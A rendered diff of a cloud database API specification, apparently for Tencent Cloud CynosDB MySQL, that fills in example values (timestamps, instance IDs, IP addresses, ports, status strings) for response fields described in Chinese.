"example": "cynosdbmysql-dkq0t36x",
|
7160
7160
|
"member": "string",
|
7161
7161
|
"name": "ClusterId",
|
7162
7162
|
"output_required": true,
|
@@ -7166,7 +7166,7 @@
|
|
7166
7166
|
{
|
7167
7167
|
"disabled": false,
|
7168
7168
|
"document": "创建时间",
|
7169
|
-
"example": "
|
7169
|
+
"example": "2024-12-02 10:59:44",
|
7170
7170
|
"member": "string",
|
7171
7171
|
"name": "CreatedTime",
|
7172
7172
|
"output_required": true,
|
@@ -7176,7 +7176,7 @@
|
|
7176
7176
|
{
|
7177
7177
|
"disabled": false,
|
7178
7178
|
"document": "删除时间",
|
7179
|
-
"example": "
|
7179
|
+
"example": "2024-12-22 10:59:44",
|
7180
7180
|
"member": "string",
|
7181
7181
|
"name": "DeletedTime",
|
7182
7182
|
"output_required": true,
|
@@ -7186,7 +7186,7 @@
|
|
7186
7186
|
{
|
7187
7187
|
"disabled": false,
|
7188
7188
|
"document": "实例组ID",
|
7189
|
-
"example": "
|
7189
|
+
"example": "cynosdbmysql-grp-nz02bc3j",
|
7190
7190
|
"member": "string",
|
7191
7191
|
"name": "InstanceGroupId",
|
7192
7192
|
"output_required": true,
|
@@ -7196,7 +7196,7 @@
|
|
7196
7196
|
{
|
7197
7197
|
"disabled": false,
|
7198
7198
|
"document": "状态",
|
7199
|
-
"example": "
|
7199
|
+
"example": "running",
|
7200
7200
|
"member": "string",
|
7201
7201
|
"name": "Status",
|
7202
7202
|
"output_required": true,
|
@@ -7206,7 +7206,7 @@
|
|
7206
7206
|
{
|
7207
7207
|
"disabled": false,
|
7208
7208
|
"document": "实例组(网络)类型。ha-ha组;ro-只读组;proxy-代理;singleRo-只读实例独占",
|
7209
|
-
"example": "
|
7209
|
+
"example": "ha",
|
7210
7210
|
"member": "string",
|
7211
7211
|
"name": "Type",
|
7212
7212
|
"output_required": true,
|
@@ -7216,7 +7216,7 @@
|
|
7216
7216
|
{
|
7217
7217
|
"disabled": false,
|
7218
7218
|
"document": "更新时间",
|
7219
|
-
"example": "
|
7219
|
+
"example": "2024-12-20 19:24:22",
|
7220
7220
|
"member": "string",
|
7221
7221
|
"name": "UpdatedTime",
|
7222
7222
|
"output_required": true,
|
@@ -7226,7 +7226,7 @@
|
|
7226
7226
|
{
|
7227
7227
|
"disabled": false,
|
7228
7228
|
"document": "内网IP",
|
7229
|
-
"example": "
|
7229
|
+
"example": "172.16.0.194",
|
7230
7230
|
"member": "string",
|
7231
7231
|
"name": "Vip",
|
7232
7232
|
"output_required": true,
|
@@ -7236,7 +7236,7 @@
|
|
7236
7236
|
{
|
7237
7237
|
"disabled": false,
|
7238
7238
|
"document": "内网端口",
|
7239
|
-
"example": "
|
7239
|
+
"example": "3306",
|
7240
7240
|
"member": "int64",
|
7241
7241
|
"name": "Vport",
|
7242
7242
|
"output_required": true,
|
@@ -7246,7 +7246,7 @@
|
|
7246
7246
|
{
|
7247
7247
|
"disabled": false,
|
7248
7248
|
"document": "外网域名",
|
7249
|
-
"example": "
|
7249
|
+
"example": "qy-cynosdbmysql-grp-nz02bc3j.sql.tencentcdb.com",
|
7250
7250
|
"member": "string",
|
7251
7251
|
"name": "WanDomain",
|
7252
7252
|
"output_required": true,
|
@@ -7256,7 +7256,7 @@
|
|
7256
7256
|
{
|
7257
7257
|
"disabled": false,
|
7258
7258
|
"document": "外网ip",
|
7259
|
-
"example": "
|
7259
|
+
"example": "81.71.200.7",
|
7260
7260
|
"member": "string",
|
7261
7261
|
"name": "WanIP",
|
7262
7262
|
"output_required": true,
|
@@ -7266,7 +7266,7 @@
|
|
7266
7266
|
{
|
7267
7267
|
"disabled": false,
|
7268
7268
|
"document": "外网端口",
|
7269
|
-
"example": "
|
7269
|
+
"example": "8723",
|
7270
7270
|
"member": "int64",
|
7271
7271
|
"name": "WanPort",
|
7272
7272
|
"output_required": true,
|
@@ -7276,7 +7276,7 @@
|
|
7276
7276
|
{
|
7277
7277
|
"disabled": false,
|
7278
7278
|
"document": "外网状态",
|
7279
|
-
"example": "
|
7279
|
+
"example": "running",
|
7280
7280
|
"member": "string",
|
7281
7281
|
"name": "WanStatus",
|
7282
7282
|
"output_required": true,
|
@@ -7296,7 +7296,7 @@
|
|
7296
7296
|
{
|
7297
7297
|
"disabled": false,
|
7298
7298
|
"document": "VPC的ID\n注意:此字段可能返回 null,表示取不到有效值。",
|
7299
|
-
"example": "
|
7299
|
+
"example": "vpc-95mugkpt",
|
7300
7300
|
"member": "string",
|
7301
7301
|
"name": "UniqVpcId",
|
7302
7302
|
"output_required": true,
|
@@ -7306,7 +7306,7 @@
|
|
7306
7306
|
{
|
7307
7307
|
"disabled": false,
|
7308
7308
|
"document": "子网ID\n注意:此字段可能返回 null,表示取不到有效值。",
|
7309
|
-
"example": "
|
7309
|
+
"example": "subnet-6zu506da",
|
7310
7310
|
"member": "string",
|
7311
7311
|
"name": "UniqSubnetId",
|
7312
7312
|
"output_required": true,
|
@@ -7326,7 +7326,7 @@
|
|
7326
7326
|
{
|
7327
7327
|
"disabled": false,
|
7328
7328
|
"document": "正在进行的任务",
|
7329
|
-
"example": "
|
7329
|
+
"example": "[\"taskSwitchVpc\"]",
|
7330
7330
|
"member": "string",
|
7331
7331
|
"name": "ProcessingTasks",
|
7332
7332
|
"output_required": true,
|
@@ -7346,7 +7346,7 @@
|
|
7346
7346
|
{
|
7347
7347
|
"disabled": false,
|
7348
7348
|
"document": "biz_net_service表id",
|
7349
|
-
"example": "
|
7349
|
+
"example": "172346",
|
7350
7350
|
"member": "int64",
|
7351
7351
|
"name": "NetServiceId",
|
7352
7352
|
"output_required": true,
|
@@ -646,7 +646,7 @@
|
|
646
646
|
{
|
647
647
|
"disabled": false,
|
648
648
|
"document": "接收用户信息\n注意:此字段可能返回 null,表示取不到有效值。",
|
649
|
-
"example": "
|
649
|
+
"example": "无",
|
650
650
|
"member": "ReceiveInfo",
|
651
651
|
"name": "ReceiveInfo",
|
652
652
|
"output_required": false,
|